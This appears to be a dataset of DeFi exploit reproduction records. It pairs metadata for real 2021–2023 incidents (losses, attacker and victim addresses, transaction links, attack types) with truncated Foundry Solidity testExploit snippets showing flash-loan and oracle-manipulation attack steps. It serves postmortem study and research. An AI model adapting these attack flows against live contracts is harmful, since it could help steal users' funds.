exploit_poc
Themis
2023-06
Themis_exp.sol
flash_loan
1bcae309a0a6be81
2026-01-07T10:59:16.511971
postmortems
arbitrum
105,524,523
~370K USD$
370,000
https://arbiscan.io/address/0xdb73eb484e7dea3785520d750eabef50a9b9ab33
null
https://arbiscan.io/address/0x75f805e2fb248462e7817f0230b36e9fae0280fc
https://arbiscan.io/tx/0xff368294ccb3cd6e7e263526b5c820b22dea2b2fd8617119ba5c3ab8417403d8
null
null
true
true
true
high
~370K USD$
flash-loan
function testExploit() public { WETH.approve(address(AaveV3), type(uint256).max); address[] memory assets = new address[](1); assets[0] = address(WETH); uint256[] memory amounts = new uint256[](1); amounts[0] = 22_000 * 1e18; uint256[] memory modes = new uint256[](1); ...
true
~370K USD$
https://arbiscan.io/address/0xdb73eb484e7dea3785520d750eabef50a9b9ab33
https://arbiscan.io/address/0x75f805e2fb248462e7817f0230b36e9fae0280fc
https://arbiscan.io/tx/0xff368294ccb3cd6e7e263526b5c820b22dea2b2fd8617119ba5c3ab8417403d8
$370.0K
10
high
Themis Exploit (2023-06)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~27,174K USD$ // Attacker : https://etherscan.io/address/0x0e816b0d0a66252c72af822d3e0773a2676f3278 // Attack Contract : https://etherscan.io/address/0x2d7973177d594237a...
exploit_poc
CompounderFinance
2023-06
CompounderFinance_exp.sol
flash_loan
45751ee4679cefbc
2026-01-07T10:59:16.512052
postmortems
ethereum
17,426,064
~27,174K USD$
27
https://etherscan.io/address/0x0e816b0d0a66252c72af822d3e0773a2676f3278
https://etherscan.io/address/0x2d7973177d594237a9b347cd41082af4cbb40f2b
https://etherscan.io/address/0xaf274e912243b19b882f02d731dacd7cd13072d0
https://etherscan.io/tx/0xcff84cc137c92e427f720ca1f2b36fbad793f34ec5117eed127060686e6797b1
null
null
true
true
true
low
~27,174K USD$
flash-loan
function testExploit() public { emit log_named_decimal_uint("Attacker amount of DAI before hack", DAI.balanceOf(address(this)), DAI.decimals()); // Step 1. Flashloan 1_239 DAI through Uniswap V3 flash loans DAIUSDCPool.flash(address(this), 1_239_990 * 1e18, 0, ""); emit log_named_decim...
true
~27,174K USD$
https://etherscan.io/address/0x0e816b0d0a66252c72af822d3e0773a2676f3278
https://etherscan.io/address/0x2d7973177d594237a9b347cd41082af4cbb40f2b
https://etherscan.io/address/0xaf274e912243b19b882f02d731dacd7cd13072d0
https://etherscan.io/tx/0xcff84cc137c92e427f720ca1f2b36fbad793f34ec5117eed127060686e6797b1
$27
9.68
high
CompounderFinance Exploit (2023-06)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "./../basetest.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$600K // Attacker : https://bscscan.com/address/0x4b92cc3452ef1e37528470495b86d3f976470734 // Attack Contract : https://bscscan.com/address/0xc40119c7269a5fa813d878bf83d...
exploit_poc
MidasCapitalXYZ
2023-06
MidasCapitalXYZ_exp.sol
oracle_manipulation
ead75e70ac1ce3d0
2026-01-07T10:59:16.512124
postmortems
bsc
null
~$600K
600,000
https://bscscan.com/address/0x4b92cc3452ef1e37528470495b86d3f976470734
https://bscscan.com/address/0xc40119c7269a5fa813d878bf83d14e3462fc8fde
https://bscscan.com/address/0xf8527dc5611b589cbb365acacaac0d1dc70b25cb
https://app.blocksec.com/explorer/tx/bsc/0x4a304ff08851106691f626045b0f55d403e3a0958363bdf82b96e8ce7209c3a6
https://medium.com/midas-capital/midas-exploit-post-mortem-1ae266222994
null
true
true
true
high
~$600K
oracle-manipulation
function testExploit() public { // Initial HAY and BUSDT amounts transferred by exploiter to this contract before attack start deal(address(HAY), address(this), 220_000e18); deal(address(BUSDT), address(this), 23_000e18); emit log_named_decimal_uint( "Exploiter ankrBNB balan...
true
~$600K
https://bscscan.com/address/0x4b92cc3452ef1e37528470495b86d3f976470734
https://bscscan.com/address/0xc40119c7269a5fa813d878bf83d14e3462fc8fde
https://bscscan.com/address/0xf8527dc5611b589cbb365acacaac0d1dc70b25cb
https://app.blocksec.com/explorer/tx/bsc/0x4a304ff08851106691f626045b0f55d403e3a0958363bdf82b96e8ce7209c3a6
https://medium.com/midas-capital/midas-exploit-post-mortem-1ae266222994
$600.0K
10
high
MidasCapitalXYZ Exploit (2023-06)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~6k USD$ // Attacker : https://etherscan.io/address/0x9748c8540a5f752ba747f1203ac13dae789033de // Attack Contract : https://etherscan.io/address/0xf73b8ea8838cba9148fb18...
exploit_poc
VINU
2023-06
VINU_exp.sol
null
b5fd7b0688da9c82
2026-01-07T10:59:16.512201
postmortems
ethereum
17,421,006
~6k USD$
6,000
https://etherscan.io/address/0x9748c8540a5f752ba747f1203ac13dae789033de
https://etherscan.io/address/0xf73b8ea8838cba9148fb182e267a000f7cfba8dd
null
https://etherscan.io/tx/0xaf46a42fe1ed7193b25c523723dc047c7500e50a00ecb7bbb822d665adb3e1f3
null
null
true
true
false
low
~6k USD$
unknown
function testExploit() public { emit log_named_decimal_uint("Attacker's contract ETH balance before attack", address(this).balance, 18); emit log_named_decimal_uint( "Attacker's contract WETH balance before attack", WETH.balanceOf(address(this)), WETH.decimals() ); address[...
true
~6k USD$
https://etherscan.io/address/0x9748c8540a5f752ba747f1203ac13dae789033de
https://etherscan.io/address/0xf73b8ea8838cba9148fb182e267a000f7cfba8dd
https://etherscan.io/tx/0xaf46a42fe1ed7193b25c523723dc047c7500e50a00ecb7bbb822d665adb3e1f3
$6.0K
6.96
medium
VINU Exploit (2023-06)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~17K USD$ // Attacker : https://etherscan.io/address/0x9d4fd681aacbc49d79c6405c9aa70d1afd5accf3 // Attack Contract : https://etherscan.io/address/0x26fe84754a1967d67b7be...
exploit_poc
MIMSpell
2023-06
MIMSpell_exp.sol
null
fbf7ad6ef9ba9c1a
2026-01-07T10:59:16.512258
postmortems
ethereum
17,521,638
~17K USD$
17,000
https://etherscan.io/address/0x9d4fd681aacbc49d79c6405c9aa70d1afd5accf3
https://etherscan.io/address/0x26fe84754a1967d67b7befaa01b10d7b35bbaf0a
https://etherscan.io/address/0xa5564a2d1190a141cac438c9fde686ac48a18a79
https://etherscan.io/tx/0x2c9f87e285026601a2c8903cf5f10e5b3655fbd0264490c41514ce073c42a9c3
null
null
true
true
false
medium
~17K USD$
unknown
function testTransaction() public { emit log_named_decimal_uint( "Exploiter's amount of MIM tokens before attack", MIM.balanceOf(exploiter), MIM.decimals() ); SUSDT.transferFrom(exploiter, address(this), 3e6); SUSDT.approve(address(DegenBox), type(uint256).max); Dege...
true
~17K USD$
https://etherscan.io/address/0x9d4fd681aacbc49d79c6405c9aa70d1afd5accf3
https://etherscan.io/address/0x26fe84754a1967d67b7befaa01b10d7b35bbaf0a
https://etherscan.io/address/0xa5564a2d1190a141cac438c9fde686ac48a18a79
https://etherscan.io/tx/0x2c9f87e285026601a2c8903cf5f10e5b3655fbd0264490c41514ce073c42a9c3
$17.0K
8.44
high
MIMSpell Exploit (2023-06)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$820K // Attacker : https://etherscan.io/address/0x8f7370d5d461559f24b83ba675b4c7e2fdb514cc // Attacker Contract : https://etherscan.io/address/0xb618d91fe014bfcb9c8d44...
exploit_poc
Pawnfi
2023-06
Pawnfi_exp.sol
oracle_manipulation
c27f6e4c0e85efb5
2026-01-07T10:59:16.512330
postmortems
ethereum
17,496,619
~$820K
820,000
https://etherscan.io/address/0x8f7370d5d461559f24b83ba675b4c7e2fdb514cc
null
https://etherscan.io/address/0x85018CF6F53c8bbD03c3137E71F4FCa226cDa92C#code
https://etherscan.io/tx/0x8d3036371ccf27579d3cb3d4b4b71e99334cae8d7e8088247517ec640c7a59a5
null
null
true
true
true
high
~$820K
oracle-manipulation
function testExploit() public { deal(address(this), 0); // I add the following line of code only to make the poc work. // Without it the output from APE.balanceOf(P-BAYC) will be 0 and the error 'ERC20: transfer amount exceeds balance' will occur // In the attack tx APE balance of P-BAYC...
true
~$820K
https://etherscan.io/address/0x8f7370d5d461559f24b83ba675b4c7e2fdb514cc
https://etherscan.io/address/0x85018CF6F53c8bbD03c3137E71F4FCa226cDa92C#code
https://etherscan.io/tx/0x8d3036371ccf27579d3cb3d4b4b71e99334cae8d7e8088247517ec640c7a59a5
$820.0K
10
high
Pawnfi Exploit (2023-06)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; // @KeyInfo - Total Lost : ~10 $BNB // Attacker : https://bscscan.com/address/0xc47fcc9263b026033a94574ec432514c639a2d12 // Attack Contract : https://bscscan.com/address/0x0d3aafb9ade835456b2595509ac1f58922e465b3 // Vulnerable Contract : https://bscscan.c...
exploit_poc
MyAi
2023-06
MyAi_exp.sol
null
48df71d91221dc38
2026-01-07T10:59:16.512405
postmortems
bsc
29,554,344
~10 $BNB
10
https://bscscan.com/address/0xc47fcc9263b026033a94574ec432514c639a2d12
https://bscscan.com/address/0x0d3aafb9ade835456b2595509ac1f58922e465b3
https://bscscan.com/address/0xdb103fd28ca4b18115f5ce908baaeed7e0f1f101
https://bscscan.com/tx/0x346f65ac333eb6d69886f5614aaf569a561a53a8d93db4384bd7c0bec15ae9f6
null
null
true
false
false
low
~10 $BNB
unknown
function testExploit() public { emit log_named_decimal_uint("Attacker WBNB balance before attack", WBNB.balanceOf(address(this)), 18); MyAi.approve(address(PancakeRouter), type(uint256).max); MyAi.approve(address(MultiSender), type(uint256).max); address[] memory Attack = new address[](...
true
~10 $BNB
https://bscscan.com/address/0xc47fcc9263b026033a94574ec432514c639a2d12
https://bscscan.com/address/0x0d3aafb9ade835456b2595509ac1f58922e465b3
https://bscscan.com/address/0xdb103fd28ca4b18115f5ce908baaeed7e0f1f101
https://bscscan.com/tx/0x346f65ac333eb6d69886f5614aaf569a561a53a8d93db4384bd7c0bec15ae9f6
$10
7.39
medium
MyAi Exploit (2023-06)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~5955 USD // TX : https://app.blocksec.com/explorer/tx/bsc/0xe1bf84b7a57498c0573361b20b16077cc933e4c47aa0821bcea5b158a60ef505 // Attacker : https://bscscan.com/address...
exploit_poc
UnverifiedContr_9ad32
2023-06
UnverifiedContr_9ad32_exp.sol
flash_loan
1e15caf36e5f1839
2026-01-07T10:59:16.512446
postmortems
bsc
29,469,587
~5955 USD
5,955
https://bscscan.com/address/0xab90a897cf6c56c69a4579ead3c900260dfba02d
https://bscscan.com/address/0xab90a897cf6c56c69a4579ead3c900260dfba02d
null
null
null
null
true
false
true
low
~5955 USD
flash-loan
function testExploit() public { emit log_named_decimal_uint("[End] Attacker BUSD after exploit", BUSD.balanceOf(address(this)), 18); DPPOracle.flashLoan(0, 1_243_763_239_827_755_213_151_683, address(this), abi.encode(address(this))); emit log_named_decimal_uint("[End] Attacker BUSD after exploi...
true
https://bscscan.com/address/0xab90a897cf6c56c69a4579ead3c900260dfba02d
https://bscscan.com/address/0xab90a897cf6c56c69a4579ead3c900260dfba02d
$6.0K
5.91
medium
UnverifiedContr_9ad32 Exploit (2023-06)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : unclear US$ // Attacker : https://bscscan.com/address/0x0060129430df7ea188be3d8818404a2d40896089 // Attack Contract : https://bscscan.com/address/0x2cc392c0207d080aec0be...
exploit_poc
SELLC03
2023-06
SELLC03_exp.sol
flash_loan
ae2b72b7d2e66899
2026-01-07T10:59:16.512486
postmortems
bsc
29,005,754
unclear US$
null
https://bscscan.com/address/0x0060129430df7ea188be3d8818404a2d40896089
https://bscscan.com/address/0x2cc392c0207d080aec0befe5272659d3bb8a7052
https://bscscan.com/address/0x84Be9475051a08ee5364fBA44De7FE83a5eCC4f1
https://bscscan.com/tx/0xe968e648b2353cea06fc3da39714fb964b9354a1ee05750a3c5cc118da23444b
null
https://twitter.com/EoceneSecurity/status/1668468933723328513
true
true
true
medium
unclear US$
flash-loan
function testExploit() public { miner.setBNB{value: 0.01 ether}(address(SELLC), address(USDT)); cheats.warp(block.timestamp + 1 * 86_400 + 1); oracle.flashLoan(600 * 1e18, 0, address(this), new bytes(1)); emit log_named_decimal_uint( "[End] Attacker WBNB balance after exploit...
true
unclear US$
https://bscscan.com/address/0x0060129430df7ea188be3d8818404a2d40896089
https://bscscan.com/address/0x2cc392c0207d080aec0befe5272659d3bb8a7052
https://bscscan.com/address/0x84Be9475051a08ee5364fBA44De7FE83a5eCC4f1
https://bscscan.com/tx/0xe968e648b2353cea06fc3da39714fb964b9354a1ee05750a3c5cc118da23444b
https://twitter.com/EoceneSecurity/status/1668468933723328513
Unknown
8.08
high
SELLC03 Exploit (2023-06)
false
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/DecurityHQ/status/1671803688996806656 // @TX // https://bscscan.com/tx/0x24a68d2a4bbb02f398d3601acfd87b09f543d935fc24862c314aaf64c295acdb // @Summary // Reelect...
exploit_poc
BUNN
2023-06
BUNN_exp.sol
null
f38e7c837dfcc05f
2026-01-07T10:59:16.512534
postmortems
bsc
29,304,627
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
false
Unknown
0.89
low
BUNN Exploit (2023-06)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~72K // Attacker - https://bscscan.com/address/0xa1e31b29f94296fc85fac8739511360f279b1976 // Attack contract - https://bscscan.com/address/0x1d448e9661c5abfc732ea81330c6...
exploit_poc
Biswap
2023-06
Biswap_exp.sol
null
cbfbbd6b6e239685
2026-01-07T10:59:16.512594
postmortems
bsc
null
~72K
72,000
null
null
null
https://bscscan.com/tx/0xebe5248820241d8de80bcf66f4f1bfaaca62962824efaaa662db84bd27f5e47e,
null
null
true
true
false
medium
~72K
unknown
function testExploit() public { V3Migrator migrator = V3Migrator(0x839b0AFD0a0528ea184448E890cbaAFFD99C1dbf); IUniswapV2Pair pairToMigrate = IUniswapV2Pair(0x63b30de1A998e9E64FD58A21F68D323B9BcD8F85); address victimAddress = 0x2978D920a1655abAA315BAd5Baf48A2d89792618; IBiswapFactoryV3 b...
true
~72K
https://bscscan.com/tx/0xebe5248820241d8de80bcf66f4f1bfaaca62962824efaaa662db84bd27f5e47e,
$72.0K
8
high
Biswap Exploit (2023-06)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~26K USD$ // Attacker - https://bscscan.com/address/0xf84efa8a9f7e68855cf17eaac9c2f97a9d131366 // Attack contract - https://bscscan.com/address/0x98e241bd3be918e0d927af8...
exploit_poc
UN
2023-06
UN_exp.sol
flash_loan
fc1f328826aa702d
2026-01-07T10:59:16.512659
postmortems
bsc
28,864,173
~26K USD$
26,000
null
null
null
https://bscscan.com/tx/0xff5515268d53df41d407036f547b206e288b226989da496fda367bfeb31c5b8b
null
null
true
true
true
medium
~26K USD$
flash-loan
function testExploit() public { emit log_named_decimal_uint( "Attacker BUSD balance before attack", BUSD.balanceOf(address(this)), BUSD.decimals() ); // End of preparation. Attack start DPPOracle.flashLoan(0, 29_100 * 1e18, address(this), new bytes(1)); emit log_nam...
true
~26K USD$
https://bscscan.com/tx/0xff5515268d53df41d407036f547b206e288b226989da496fda367bfeb31c5b8b
$26.0K
7.45
medium
UN Exploit (2023-06)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.17; import "forge-std/Test.sol"; import "./../interface.sol"; // REKT - NST Simple Swap // Write up Author // https://twitter.com/eugenioclrc // Reported on https://discord.com/channels/1100129537603407972/1100129538056396870/1114142216923926528 // @TX // ht...
exploit_poc
NST
2023-06
NST_exp.sol
flash_loan
8eda1bab284990fe
2026-01-07T10:59:16.512702
postmortems
polygon
43,430,814
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
function testExploit() public { usdt.approve(swapper, type(uint256).max); nst.approve(swapper, type(uint256).max); // the attacker use balancer to take a flashloan of 40k usd, im gonna mock it // to make it simpler to read deal(address(usdt), address(this), 40_000_000_000); // 4...
true
Unknown
4.53
low
NST Exploit (2023-06)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; // @KeyInfo - Total Lost : ~1300 $USDC // Attacker : https://etherscan.io/address/0x015d0b51d0a65ad11cf4425de2ec86a7b320db3f // Attack Contract : https://etherscan.io/address/0xfe2011dad32ad6dfd128e55490c0fd999f3d2221 // Vulnerable Contract : https://ethe...
exploit_poc
Contract_0x7657
2023-06
Contract_0x7657_exp.sol
flash_loan
cd26e577a5b58e7f
2026-01-07T10:59:16.512746
postmortems
ethereum
17,511,178
~1300 $USDC
1,300
https://etherscan.io/address/0x015d0b51d0a65ad11cf4425de2ec86a7b320db3f
https://etherscan.io/address/0xfe2011dad32ad6dfd128e55490c0fd999f3d2221
https://etherscan.io/address/0x76577603f99eae8320f70b410a350a83d744cb77
https://etherscan.io/tx/0x74279a131dccd6479378b3454ea189a6ce350cce51de47d81a0ef23db1b134d5
null
null
true
false
true
low
~1300 $USDC
flash-loan
function testExploit() public { emit log_named_decimal_uint("Attacker USDT balance before attack", USDT.balanceOf(address(this)), 6); uint256 Victim_balance = USDT.balanceOf(address(Victim)); (bool success, bytes memory data) = Contract_addr.call(abi.encodeWithSelector(bytes4(0x0a8fe...
true
~1300 $USDC
https://etherscan.io/address/0x015d0b51d0a65ad11cf4425de2ec86a7b320db3f
https://etherscan.io/address/0xfe2011dad32ad6dfd128e55490c0fd999f3d2221
https://etherscan.io/address/0x76577603f99eae8320f70b410a350a83d744cb77
https://etherscan.io/tx/0x74279a131dccd6479378b3454ea189a6ce350cce51de47d81a0ef23db1b134d5
$1.3K
8.16
high
Contract_0x7657 Exploit (2023-06)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~300K USD$ // Attacker : https://bscscan.com/address/0x0a3fee894eb8fcb6f84460d5828d71be50612762 // Attack Contract : https://bscscan.com/address/0x105e9b0266ae0ae670b7fe...
exploit_poc
DDCoin
2023-06
DDCoin_exp.sol
flash_loan
439ee19647366c24
2026-01-07T10:59:16.512788
postmortems
bsc
28,714,107
~300K USD$
300,000
https://bscscan.com/address/0x0a3fee894eb8fcb6f84460d5828d71be50612762
https://bscscan.com/address/0x105e9b0266ae0ae670b7fe9af08cf32049f0dd21
https://bscscan.com/address/0xb3a636ac4c271e6cd962cad98eae9cf71f5a49c8
https://bscscan.com/tx/0xd92bf51b9bf464420e1261cfcd8b291ee05d5fbffbfbb316ec95131779f80809
null
null
true
true
true
high
~300K USD$
flash-loan
function testExploit() public { deal(address(BUSDT), address(this), 0); emit log_named_decimal_uint( "BUSDT attacker balance before exploit", BUSDT.balanceOf(address(this)), BUSDT.decimals() ); DPPOracle1.flashLoan(0, BUSDT.balanceOf(address(DPPOracle1)), address(this), new ...
true
~300K USD$
https://bscscan.com/address/0x0a3fee894eb8fcb6f84460d5828d71be50612762
https://bscscan.com/address/0x105e9b0266ae0ae670b7fe9af08cf32049f0dd21
https://bscscan.com/address/0xb3a636ac4c271e6cd962cad98eae9cf71f5a49c8
https://bscscan.com/tx/0xd92bf51b9bf464420e1261cfcd8b291ee05d5fbffbfbb316ec95131779f80809
$300.0K
10
high
DDCoin Exploit (2023-06)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~230K US$ // Attacker : https://bscscan.com/address/0x69810917928b80636178b1bb011c746efe61770d // Attack Contract : https://bscscan.com/address/0xcdb3d057ca0cfdf630baf3f...
exploit_poc
SHIDO
2023-06
SHIDO_exp.sol
flash_loan
2b9eae9a00b56793
2026-01-07T10:59:16.512845
postmortems
bsc
29,365,171
~230K US$
230,000
https://bscscan.com/address/0x69810917928b80636178b1bb011c746efe61770d
https://bscscan.com/address/0xcdb3d057ca0cfdf630baf3f90e9045ddeb9ea4cc
https://bscscan.com/address/0xa963ee460cf4b474c35ded8fff91c4ec011fb640
https://bscscan.com/tx/0x72f8dd2bcfe2c9fbf0d933678170417802ac8a0d8995ff9a56bfbabe3aa712d6
null
https://twitter.com/Phalcon_xyz/status/1672473343734480896
true
true
true
high
~230K US$
flash-loan
function testExploit() public { DVM(dodo).flashLoan(40 * 1e18, 0, address(this), new bytes(1)); emit log_named_decimal_uint( "Attacker WBNB balance after exploit", WBNB.balanceOf(address(this)), WBNB.decimals() ); }
true
~230K US$
https://bscscan.com/address/0x69810917928b80636178b1bb011c746efe61770d
https://bscscan.com/address/0xcdb3d057ca0cfdf630baf3f90e9045ddeb9ea4cc
https://bscscan.com/address/0xa963ee460cf4b474c35ded8fff91c4ec011fb640
https://bscscan.com/tx/0x72f8dd2bcfe2c9fbf0d933678170417802ac8a0d8995ff9a56bfbabe3aa712d6
https://twitter.com/Phalcon_xyz/status/1672473343734480896
$230.0K
9.08
high
SHIDO Exploit (2023-06)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~16k // Attacker contract address : https://bscscan.com/address/0x8213e87bb381919b292ace364d97d3a1ee38caa4 // Vulnerable contract : https://bscscan.com/address/0xdd9b223...
exploit_poc
CFC
2023-06
CFC_exp.sol
flash_loan
a12bce69602e5b63
2026-01-07T10:59:16.512893
postmortems
bsc
29,116,478
~16k
16,000
null
null
https://bscscan.com/address/0xdd9b223aec6ea56567a62f21ff89585ff125632c
https://explorer.phalcon.xyz/tx/bsc/0xa3c130ed8348919f73cbefce0f22d46fa381c8def93654e391ddc95553240c1e
null
null
true
true
true
medium
~16k
flash-loan
function testSkim() public { deal(address(BEP20USDT), address(this), 0); emit log_named_decimal_uint( "Attacker BEP20USDT balance before attack", BEP20USDT.balanceOf(address(this)), BEP20USDT.decimals() ); takeFlashloan(DPPOracle1); emit log_named_decimal_uint( ...
true
~16k
$16.0K
9.77
high
CFC Exploit (2023-06)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~125K USD$ // Attacker : https://bscscan.com/address/0xf84efa8a9f7e68855cf17eaac9c2f97a9d131366 // Attack Contract : https://bscscan.com/address/0x98e241bd3be918e0d927af...
exploit_poc
ARA
2023-06
ARA_exp.sol
flash_loan
325dc8952f3e0fd0
2026-01-07T10:59:16.512947
postmortems
bsc
29,214,010
~125K USD$
125,000
https://bscscan.com/address/0xf84efa8a9f7e68855cf17eaac9c2f97a9d131366
https://bscscan.com/address/0x98e241bd3be918e0d927af81b430be00d86b04f9
https://bscscan.com/address/0x7ba5dd9bb357afa2231446198c75bac17cefcda9
https://bscscan.com/tx/0xd87cdecd5320301bf9a985cc17f6944e7e7c1fbb471c80076ef2d031cc3023b2
null
null
true
true
true
high
~125K USD$
flash-loan
function testExploit() public { deal(address(BUSDT), address(this), 0); BUSDT.approve(address(Router), type(uint256).max); ARA.approve(address(Router), type(uint256).max); emit log_named_decimal_uint( "Attacker BUSDT balance before hack", BUSDT.balanceOf(address(this)), BUSD...
true
~125K USD$
https://bscscan.com/address/0xf84efa8a9f7e68855cf17eaac9c2f97a9d131366
https://bscscan.com/address/0x98e241bd3be918e0d927af81b430be00d86b04f9
https://bscscan.com/address/0x7ba5dd9bb357afa2231446198c75bac17cefcda9
https://bscscan.com/tx/0xd87cdecd5320301bf9a985cc17f6944e7e7c1fbb471c80076ef2d031cc3023b2
$125.0K
9.31
high
ARA Exploit (2023-06)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~800K USD$ // Attacker : https://etherscan.io/address/0x1e8419e724d51e87f78e222d935fbbdeb631a08b // Attack Contract : https://etherscan.io/address/0x0b09c86260c12294e3b9...
exploit_poc
Sturdy
2023-06
Sturdy_exp.sol
flash_loan
f14e57c68f3693f7
2026-01-07T10:59:16.513006
postmortems
ethereum
17,460,609
~800K USD$
800,000
https://etherscan.io/address/0x1e8419e724d51e87f78e222d935fbbdeb631a08b
https://etherscan.io/address/0x0b09c86260c12294e3b967f0d523b4b2bcdfbeab
https://etherscan.io/address/0x9f72dc67cec672bb99e3d02cbea0a21536a2b657
https://etherscan.io/tx/0xeb87ebc0a18aca7d2a9ffcabf61aa69c9e8d3c6efade9e2303f8857717fb9eb7
https://sturdyfinance.medium.com/exploit-post-mortem-49261493307a
https://twitter.com/AnciliaInc/status/1668081008615325698
true
true
true
high
~800K USD$
flash-loan
function testExploit() public { deal(address(this), 0); address[] memory assets = new address[](2); assets[0] = address(wstETH); assets[1] = address(WETH); uint256[] memory amounts = new uint256[](2); amounts[0] = 50_000 * 1e18; amounts[1] = 60_000 * 1e18; ...
true
~800K USD$
https://etherscan.io/address/0x1e8419e724d51e87f78e222d935fbbdeb631a08b
https://etherscan.io/address/0x0b09c86260c12294e3b967f0d523b4b2bcdfbeab
https://etherscan.io/address/0x9f72dc67cec672bb99e3d02cbea0a21536a2b657
https://etherscan.io/tx/0xeb87ebc0a18aca7d2a9ffcabf61aa69c9e8d3c6efade9e2303f8857717fb9eb7
https://sturdyfinance.medium.com/exploit-post-mortem-49261493307a
https://twitter.com/AnciliaInc/status/1668081008615325698
$800.0K
10
high
Sturdy Exploit (2023-06)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED // !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !! pragma solidity >=0.7.0 <0.9.0; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { uint256 wCRES_amount = 130_000_000_000_000_000_000_000; uint256 usdt_am...
exploit_poc
dodo_flashloan
2021-03
dodo_flashloan_exp.sol
flash_loan
124bf22a388fb6d4
2026-01-07T10:59:16.513096
postmortems
unknown
12,000,000
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
function testExploit() public { address me = address(this); dvm.flashLoan(wCRES_amount, usdt_amount, me, "whatever"); //emit log_named_uint("Exploit completed, WBNB Balance",wbnb.balanceOf(mywallet)); }
true
Unknown
4.09
low
dodo_flashloan Exploit (2021-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://paidnetwork.medium.com/paid-network-attack-postmortem-march-7-2021-9e4c0fef0e07 // Root cause: key compromised or rugged // @TX // https://etherscan.io/tx/0x4bb10927ea7afc...
exploit_poc
PAID
2021-03
PAID_exp.sol
null
1835d33ab25a2a84
2026-01-07T10:59:16.513136
postmortems
ethereum
11,979,839
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
function testExploit() public { cheats.prank(0x18738290AF1Aaf96f0AcfA945C9C31aB21cd65bE); PAID.mint(address(this), 59_471_745_571_000_000_000_000_000); //key compromised or rugged emit log_named_decimal_uint("[End] PAID balance after exploitation:", PAID.balanceOf(address(this)), 18); } ...
true
Unknown
2.62
low
PAID Exploit (2021-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; interface IUNIPAIR is IERC20 { function sync() external; function getReserves() external returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast); function swap(uint256...
exploit_poc
Snood
2022-06
Snood_exp.sol
null
d70a075ab1e676ac
2026-01-07T10:59:16.513178
postmortems
unknown
14,983,660
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { // address attacker = vm.addr(1); address attacker = 0x180ea08644b123D8A3f0ECcf2a3b45A582075538; emit log("before the attack"); emit log_uint(WETH.balanceOf(attacker)); assertTrue(WETH.balanceOf(attacker) == 0); uint256 balance = SNOOD.bal...
true
Unknown
2.93
low
Snood Exploit (2022-06)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo // Total Lost : 3087 ETH (~3,870,000 US$) // Attacker Wallet : 0xb7cbb4d43f1e08327a90b32a8417688c9d0b800a // Main Attack Contract : 0xf70f691d30ce23786cfb3a1522cfd76d159aca8d // Vulner...
exploit_poc
XCarnival
2022-06
XCarnival_exp.sol
null
a0995a971b94dffb
2026-01-07T10:59:16.513230
postmortems
ethereum
15,028,846
3087 ETH (~3,870,000 US$)
3,087
null
null
null
null
null
null
true
false
false
low
3087 ETH (~3,870,000 US$)
unknown
